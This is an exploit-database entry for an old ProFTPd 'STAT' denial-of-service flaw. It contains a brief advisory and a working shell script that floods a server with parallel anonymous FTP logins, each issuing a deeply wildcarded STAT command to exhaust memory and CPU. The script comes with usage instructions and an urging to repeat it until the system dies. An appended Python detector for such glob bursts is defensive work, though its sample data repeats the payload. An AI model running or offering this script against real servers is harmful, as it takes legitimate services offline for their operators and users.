ProFTPd 1.2.x – ‘STAT’ Denial of Service

Vulnerability ID: 1053658
Vulnerability type:
Published: 2002-12-09
Updated: 2002-12-09
CVE ID: N/A
CNNVD-ID: N/A
Platform: Linux
CVSS score: N/A
|Vulnerability source
https://www.exploit-db.com/exploits/22079
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
source: http://www.securityfocus.com/bid/6341/info

A denial of service vulnerability has been reported for ProFTPD. It is possible to stop ProFTPD from responding to legitimate requests for service by issuing specially crafted STAT commands. This will result in a denial of service condition.

#!/bin/sh
#
# proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least
# might work against many other FTP daemons
# consumes nearly all memory and a lot of CPU
#
# tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3
#
# 7-dec-02 - detach  -  www.duho.org
#
# use: ./prodos.sh <host> <user> <pass>
# do this some more to make sure the system eventually dies

cnt=25
while [ $cnt -gt 0 ] ; do
ftp -n << EOF&
o $1
quote user $2
quote pass $3
quote stat /*/*/*/*/*/*/*
quit
EOF
let cnt=cnt-1
done
sleep 2
killall -9 ftp
echo DONE!

#end
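
A defender's view of the same traffic, as an added example that is not part of the original advisory or exploit: a Python check that flags FTP commands whose argument has many wildcard path components, and the clients that send them in bursts. The "<client> <command>" line format, both thresholds, and the inclusion of LIST and NLST alongside STAT are assumptions.

```python
import re
from collections import Counter

# STAT is the command on this page; LIST and NLST are included as an assumption.
GLOB_COMMANDS = {"STAT", "LIST", "NLST"}
MAX_WILDCARD_COMPONENTS = 3   # assumed policy threshold per command
BURST_THRESHOLD = 5           # assumed number of flagged commands per client

# Assumed input format: "<client> <raw FTP command line>"
LINE_RE = re.compile(
    r"^(?P<client>\S+)\s+(?P<verb>[A-Za-z]{3,4})(?:\s+(?P<arg>.*))?$"
)
WILDCARD_RE = re.compile(r"[*?\[]")


def wildcard_components(path):
    """Count path components that contain a glob metacharacter."""
    return sum(1 for part in path.split("/") if WILDCARD_RE.search(part))


def is_suspicious(line):
    """Return (client, argument) for an over-broad glob command, else None."""
    m = LINE_RE.match(line.strip())
    if not m or m.group("verb").upper() not in GLOB_COMMANDS:
        return None
    arg = m.group("arg") or ""
    if wildcard_components(arg) > MAX_WILDCARD_COMPONENTS:
        return m.group("client"), arg
    return None


def burst_clients(lines):
    """Clients that sent at least BURST_THRESHOLD over-broad glob commands."""
    hits = Counter()
    for line in lines:
        found = is_suspicious(line)
        if found:
            hits[found[0]] += 1
    return sorted(c for c, n in hits.items() if n >= BURST_THRESHOLD)


# Constructed sample input (documentation IP ranges), not real log data.
SAMPLE = (
    ["192.0.2.10 STAT /pub/*.tar.gz", "192.0.2.10 LIST", "192.0.2.11 USER ftp"]
    + ["198.51.100.7 stat /*/*/*/*/*/*/*"] * 25
)

if __name__ == "__main__":
    for client in burst_clients(SAMPLE):
        print("glob-expansion burst from", client)
```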
